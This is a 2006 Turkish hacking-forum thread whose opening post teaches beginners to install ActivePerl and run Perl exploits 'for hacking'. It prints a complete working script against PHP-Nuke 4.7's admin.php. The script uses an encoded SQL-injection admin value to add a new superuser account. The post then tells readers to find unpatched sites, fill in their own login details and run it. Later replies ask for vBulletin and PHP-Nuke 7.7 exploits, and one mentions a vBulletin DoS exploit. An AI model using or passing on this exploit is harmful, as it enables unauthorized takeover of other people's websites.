PDA

Orijinalini görmek için tıklayınız : Perl Exploit Kullanımı Nedir Ne Deildir [lamerliği biraz bırakalım]


SUSKUN
03-14-2006, 10:17 PM
Perl Exploit

Şimdi efendim lafa başlamadan önce şurdan bi güzel "active perl" indirin download:
[Only Registered Users Can See Links] ([Only Registered Users Can See Links])
Sonra Bunu kurduğunuzda şu dizine kaydedilcek
c:/perl
Şimdi Perl Exploti nasıl kullanılır.Bu Exploit nedir diye kafanızda 2 tane soru olması lazım 1-Exploit nedir 2-Neden kullanılır : F
1-Exploit,denilen bu şey kodlardan ibaret perl ve c dili ile yazılmış kodlardır.Kendileri sistem açıklarını kullanılırlar [PHP-nuke,phpbb,Iss vsvs] gibi birçok açıkları kullanarak sanki harbi hack yapıomuş hissi uyandırır İşte burda can alıcı 1 nokta var.C dili ile yazılmış exploitler yani".c" ile bitenler windows sistemlerde çalışamaz onlar için shell denilen bir kontrol paneli lazımdır kendiside unix işletim sisteminde mevcuttur.Ama para ile internetten shell hesabı açabilirsinizki tavsiye etmem[gidin 5 milyon verin mandrake linux dergisi alın yanında linux hediye [Only Registered Users Can See Links] ".pl" uzantılı yani perl dili ile yazılmış exploitler ise anlatacağım....
2-Peki neden kullanılır,çok basit bi cvp var "hack "için :Z nese gelelim anlatmaya bukadar geyiq yeter [Only Registered Users Can See Links]
Nasıl Kullanılır.
Şimdi Efendim
"Başlat>Çalıştır>Cmd"kadar gelin ve işte karşınızda Komut sistemi şimdi çıkan ekrana
cd .. [cd yazın ve bir boşluk iki nokta] entera basın sonra tekrardan
cd .. [taki ekranda "c://" yazısını görene kadar cd .. yapın]
Sonra çıkan ekrana
cd perl [enterlayın]
cd bin [enterlayın]
eet Karşınızda şu an
c://perl/bin yazması lazım:
Evet şimdi bir örnek çalışalım





#Code begin
#!/usr/bin/perl

use LWP::UserAgent;

if (@ARGV != 1)
{
print "usage: $0 [path_to_admin.php]
";
exit;
}

$path = $ARGV[0];

$php_nuke = LWP::UserAgent->new() or die;
$php_nuke->post(
"$path",
{
"add_aid" => "login isminiz", ### login
"add_name" => "login isminiz", ### name
"add_pwd" => "şifreniz", ### password
"add_email" => "mail@adresiniz.com", ### mail
"admin" => "eCcgVU5JT04gU0VMRUNUIDEvKjox", ###
"add_radminsuper" => "1", ###
"op" => "AddAuthor" ###
}
);

print "DONE!
Now go to $path and login as ADMIN";
exit;
#Code end


Bu Kodu "c://perl/bin" dizinin içine "x.pl" olarak kaydedin yada "ex.pl" önemli deil maksat ".pl" uzantılı olsun.Şimdi bu kod "phpNuke 4.7" açığıdır.Şimdi 4.7 olan bir php-nuke sitesi bulun sonra bu kodun için "login isminiz" gibi yerler var oraları doldurun sonrada:
Çalıştırmak için C:/Perl/phpnuke.pl [B][Only Registered Users Can See Links] ([Only Registered Users Can See Links]) yazın ve enter
Eğer çalışmıyorsa patchlenmiştir.

Not : Exploit türlerinden istek yapabılırsınız ...

RapStyle
03-14-2006, 10:30 PM
Teşekkürler..

xm19
03-15-2006, 10:02 AM
Emegine salık tesekkürler

sybaran
03-17-2006, 06:30 PM
teşekkürler...

inanc
05-25-2006, 03:38 PM
vbulletinin açığı varmı konuda?

excell38660
06-04-2006, 09:20 PM
evet arekadaşlar v bulletin için var mı??

t@mu
06-05-2006, 10:29 PM
php-nuke 7.7 ıcın varmı

alfonso
06-05-2006, 10:43 PM
vb sürümüne göre değiştir. 3,5,3 ün dos.pl açığı var. Başkada yok sanırım

t@mu
06-10-2006, 06:07 PM
evet sadece dos acıgı var oda fazla ıse yaramıyo